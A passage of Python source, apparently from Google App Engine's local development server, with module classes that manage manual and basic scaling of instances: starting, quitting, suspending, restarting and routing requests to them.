return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
      permit_warmup: If True then the new instance.Instance will be sent a
          warmup request if it is configured to receive them.
    Returns:
      The newly created instance.Instance, or None if no new instance could
      be created because the maximum number of instances has already been
      reached.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
    except Exception:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
        # Force true division: both operands are ints, so Python 2 integer
        # division would floor the ratio before math.ceil could round it up.
        return int(math.ceil(float(peak_concurrent_requests) /
                             self.max_instance_concurrent_requests))
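  # Worked example (numbers assumed): with a 60s window whose peak was 9
  # concurrent requests and max_instance_concurrent_requests == 4, this
  # returns ceil(9 / 4.0) == 3 required instances.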
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
                              Module that are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
              key=lambda inst: inst.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
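  # Selection sketch (state assumed): with required instances whose remaining
  # capacities are [0, 2], the one with 2 (most headroom) wins; if every
  # required instance is saturated, the idle instance with the *most*
  # outstanding requests is reused first so the other idle instances stay
  # request-free and remain candidates for quitting.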
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
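  # E.g. (counts assumed): with min_idle_instances=1, max_idle_instances=2
  # and 4 idle instances, at most one idle, request-free instance is quit per
  # pass, and _MIN_SECONDS_BETWEEN_QUITS (60s) throttles successive quits.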
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
_MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
      automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
    # The change watcher thread depends on the balanced module and the
    # watcher, so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _async_start_instance(self, wsgi_servr, inst):
_THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
      except Exception:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
_THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.ModuleAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
_THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.ModuleAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
self._async_suspend_instance(inst, wsgi_servr.port)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
_MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
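  # For example, following the forms named in the docstring:
  #   _parse_idle_timeout('15m') -> 900
  #   _parse_idle_timeout('10s') -> 10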
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
      automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
    # The change watcher thread depends on the balanced module and the
    # watcher, so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
_THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
          interactive command e.g. 8080.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
